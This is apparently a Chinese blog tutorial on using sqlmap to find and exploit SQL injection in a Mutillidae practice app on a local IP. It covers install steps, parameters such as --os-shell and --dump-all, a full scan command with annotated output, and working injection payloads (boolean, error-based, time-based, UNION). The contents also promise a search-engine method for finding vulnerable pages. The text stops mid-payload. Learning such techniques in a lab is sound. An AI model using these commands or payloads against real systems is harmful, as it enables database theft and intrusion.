SQL注入漏洞之sqlmap自动注入

化风寻你

已于 2023-09-19 18:04:15 修改

阅读量476

点赞数

分类专栏：安全入门文章标签：网络安全 mysql

于 2023-09-19 18:02:55 首次发布

本文链接：https://blog.csdn.net/XZZbh/article/details/133036035

版权

本文详细介绍了如何利用sqlmap进行SQL注入漏洞的检测与利用，包括安装sqlmap、确定注入点、无密码无登录情况下的GET注入、提权操作、POST方式的SQL注入、应对高等级注入策略，以及配合搜索引擎寻找潜在漏洞页面的安全建议。

摘要由CSDN通过智能技术生成

提示：文章写完后，目录可以自动生成，如何生成可参考右边的帮助文档

SQL注入漏洞之sqlmap自动注入

一、第一步:安装sqlmap
- 1、sqlmap常用参数:
二、确定SQL注入点
三、使用sqlmap自动扫描注入GET提交方式(无密码无登录情况)
四、提权操作
- 1、 --sql-shell 获得数据库的shell
- 2、通过配合burpsuite的HTTP头部文件进行自动注入
五、使用HTTP头部信息进行POST提交方式的SQL注入.
六、较高等级的SQL注入
七、配合搜索引擎获取可能存在注入漏洞的页面.

一、第一步:安装sqlmap

root@lqh:/home/lqh# apt-get install sqlmap -y
# 我这里使用的ubuntu的系统,虽然有kali但是由于笔记本内存不够,再开一个虚拟机耗费内存,所以直接安装在物理机上.

1、sqlmap常用参数:

-p TESTPARAMETER    Testable parameter(s)  注入点参数
--dbms=DBMS         Force back-end DBMS to this value  指定后端数据库类型
--proxy=PROXY       Use a proxy to connect to the target URL 使用代理进行连接到目标地址
--batch             Never ask for user input, use the default behavior 全部自动不需要问我
--level=LEVEL       Level of tests to perform (1-5, default 1) 执行测试的等级1到5 5最高等级
--risk=RISK			 Risk of tests to perform (1-3, default 1) 执行测试的风险风险越高速度越快
--cookie=COOKIE     HTTP Cookie header value 指定cookie值
--threads=THREADS   Max number of concurrent HTTP(s) requests (default 1) 最大工作线程数默认1
-a -all 获取所有信息,也会dump所有库所有内容下来
--dbs Enumerate DBMS databases  枚举数据库
--users 枚举数据库用户
--current-user 检索当前数据库用户
--current-dbs 当前数据库
--tables 枚举某个数据库下面的每个表
--columns 枚举某个表下面的每列的数据
--dump-all 备份所有数据库下来
--dump 指定数据库进行备份
--sql-shell 打开sqlshell的一个终端
--os-shell 打开系统的一个终端
-D 指定数据库名
-T 指定表名

二、确定SQL注入点

通过基于错误注入的方式来确定SQL注入点.’
通过基于时间盲注的方式来确定SQL注入点.’ or 1=1 and sleep(10) –

三、使用sqlmap自动扫描注入GET提交方式(无密码无登录情况)

root@lqh:/home/lqh# sqlmap -u "http://192.168.1.126/mutillidae/index.php?page=user-info.php&username=admin&password=admin&user-info-php-submit-button=View+Account+Details"--batch -p username --level=5 --risk=3 --dbms=mysql
/**
**首先参数部分 
--batch 让它全部默认自动
-p 指定是那个参数进行SQL注入
--level 指定测试等级
--risk 指定测试风险等级
--dbms 因为我知道是mysql所以指定了数据库类型是mysql ,一般情况下不指定这个参数,指定这个参数只是为了可以快速的获得测试结果.**
**/
   ___

       __H__
 ___ ___["]_____ ___ ___  {
   1.2.4#stable}
|_ -| . [.]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 14:18:12

[14:18:12] [INFO] testing connection to the target URL
    // 首先它测试连接到目标地址
[14:18:13] [INFO] heuristics detected web page charset 'windows-1252'
    // 检测网页字符集
[14:18:13] [INFO] testing if the target URL content is stable
    // 检测测试目标是否稳定
[14:18:13] [INFO] target URL content is stable
    //测试目标稳定
[14:18:13] [INFO] heuristics detected web page charset 'ascii'
    //检测到网页字符集
[14:18:13] [INFO] heuristic (basic) test shows that GET parameter 'username' might be injectable (possible DBMS: 'MySQL')
    // 根据我们设定的注入参数username和后端数据库为mysql
[14:18:13] [INFO] heuristic (XSS) test shows that GET parameter 'username' might be vulnerable to cross-site scripting (XSS) attacks
    // 测试表示参数username容易受到xss攻击
[14:18:13] [INFO] testing for SQL injection on GET parameter 'username'
    // 开始在username参数上测试SQL注入
[14:18:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
    // 测试条件过滤语句
[14:18:14] [WARNING] reflective value(s) found and filtering out
    // 过滤掉反射值
[14:19:45] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
    // 测试基于盲注的布尔
[14:19:51] [INFO] GET parameter 'username' appears to be 'OR boolean-based blind - WHERE or HAVING clause' injectable (with --string="Signature=")
    //实在是太多了......
[14:19:51] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[14:19:52] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[14:19:53] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[14:19:54] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[14:19:55] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[14:19:56] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[14:19:57] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[14:19:58] [INFO] GET parameter 'username' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable 
[14:19:58] [INFO] testing 'MySQL inline queries'
[14:19:58] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[14:19:59] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[14:20:00] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[14:20:01] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[14:20:02] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[14:20:02] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[14:20:03] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[14:20:15] [INFO] GET parameter 'username' appears to be 'MySQL >= 5.0.12 AND time-based blind' injectable 
[14:20:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[14:20:15] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[14:20:17] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[14:20:21] [INFO] target URL appears to have 7 columns in query
[14:20:25] [INFO] GET parameter 'username' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
[14:20:25] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
GET parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 146 HTTP(s) requests:
---
Parameter: username (GET)
    Type: boolean-based blind //基于布尔盲注入点
    Title: OR boolean-based blind - WHERE or HAVING clause
    //测试实例
    Payload: page=user-info.php&username=-8941' OR 4953=4953-- DSmw&password=admin&user-info-php-submit-button=View Account Details

    Type: error-based // 基于错误注入点
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    //测试实例
    Payload: page=user-info.php&username=admin' AND (SELECT 9444 FROM(SELECT COUNT(*),CONCAT(0x7178767071,(SELECT (ELT(9444=9444,1))),0x716a717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- JkoJ&password=admin&user-info-php-submit-button=View Account Details

    Type: AND/OR time-based blind //基于时间盲注入点
    Title: MySQL >= 5.0.12 AND time-based blind
    //测试实例
    Payload: page=user-info.php&username=admin' AND SLEEP(5)-- pWWL&password=admin&user-info-php-submit-button=View Account Details

    Type: UNION query //联合查询入点
    Title: Generic UNION query (NULL) - 7 columns
    //测试实例
    Payload: page=user-info.php&username=admin' UNION ALL SELECT NULL